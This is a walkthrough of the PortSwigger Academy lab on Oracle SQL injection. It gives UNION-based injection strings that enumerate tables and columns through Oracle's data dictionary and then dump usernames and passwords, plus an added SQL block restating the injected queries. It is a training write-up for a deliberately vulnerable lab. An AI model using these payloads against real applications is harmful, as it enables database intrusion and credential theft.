Write-up: SQL injection attack, listing the database contents on Oracle @ PortSwigger Academy
This write-up for the lab SQL injection attack, listing the database contents on Oracle is part of my walkthrough series for PortSwigger’s Web Security Academy.
Learning path: Server-side topics → SQL injection
Python script: script.py
Lab description
Query
The query used in the lab will look something like
SELECT * FROM someTable WHERE category = '<CATEGORY>'
Steps
The first steps are identical to the labs SQL injection UNION attack, determining the number of columns returned by the query and SQL injection UNION attack, finding a column containing text and are not repeated here.
As a result of these steps, I find out that the number of columns is 2, with both being string columns.
Find users table
The database in use here is Oracle, which exposes table metadata through the all_tables data dictionary view. The relevant documentation lists the available columns; the one I am interested in is table_name.
I also select an invalid category so that only my injected output appears. So I inject ' UNION SELECT table_name, null from all_tables-- into the parameter to form the following query:
SELECT * FROM someTable WHERE category='X' UNION SELECT table_name, null from all_tables--'
Enumerate columns in this table
The all_tab_columns view holds information about the columns of each table, specifically in its column_name column. The users table in my lab instance is called USERS_TOAEAL (the suffix is randomised per lab instance, so yours will differ; unquoted Oracle identifiers are stored in upper case, so the literal must be upper case too). The string to inject is ' UNION SELECT column_name, null from all_tab_columns WHERE table_name = 'USERS_TOAEAL'-- to form this query:
SELECT * FROM someTable WHERE category='X' UNION SELECT column_name, null from all_tab_columns WHERE table_name = 'USERS_TOAEAL'--'
Enumerate all usernames and passwords
Now I have all information to obtain the required usernames and passwords. I inject ' UNION SELECT USERNAME_DINZLR, PASSWORD_BTNGGB from USERS_TOAEAL--
to form this query:
SELECT * FROM someTable WHERE category='X' UNION SELECT USERNAME_DINZLR, PASSWORD_BTNGGB from USERS_TOAEAL--'
The last step is to simply log in to solve this exercise.
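The three steps above written out as the queries the Oracle back end actually runs, as an added example that is not part of the original write-up or the lab. someTable and the USERS_TOAEAL / USERNAME_DINZLR / PASSWORD_BTNGGB names are taken from this write-up's lab instance and are assumed placeholders; the owner filter and the data_type concatenation are additions that narrow the noise a practitioner sees, not something the lab requires.

```sql
-- Added example, not code from the lab or the write-up. 'X' is a category
-- that matches nothing, so only the UNION rows are rendered by the page.
-- Every SELECT in Oracle needs a FROM clause, which is why a probe such as
-- SELECT 'a', NULL would have to read FROM dual; the dictionary views
-- used here already supply one.

-- Step 1: list tables. all_tables also returns the SYS/SYSTEM dictionary
-- tables, so restricting to the current schema (USER is Oracle's
-- current-user function) keeps the application's own tables visible.
-- Drop the WHERE clause if the application connects as a different user
-- than the table owner.
SELECT * FROM someTable WHERE category = 'X'
UNION SELECT table_name, NULL FROM all_tables WHERE owner = USER --'

-- Step 2: columns of the users table. Unquoted identifiers are stored in
-- upper case in the dictionary, so the literal is upper case. Appending
-- data_type into the same string column shows which columns are text
-- without a second round trip.
SELECT * FROM someTable WHERE category = 'X'
UNION SELECT column_name || ':' || data_type, NULL FROM all_tab_columns
  WHERE table_name = 'USERS_TOAEAL' --'

-- Step 3: dump credentials. Both result columns are strings (found in the
-- column-count and text-column steps), so username and password can be
-- returned side by side, one row per user.
SELECT * FROM someTable WHERE category = 'X'
UNION SELECT USERNAME_DINZLR, PASSWORD_BTNGGB FROM USERS_TOAEAL --'
```

Each statement is the full query after injection: everything from `UNION` to `--` is the attacker-supplied part, and the trailing `'` after the comment marker is the quote the original query would have closed, which the comment neutralises.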
Originally published at https://github.com.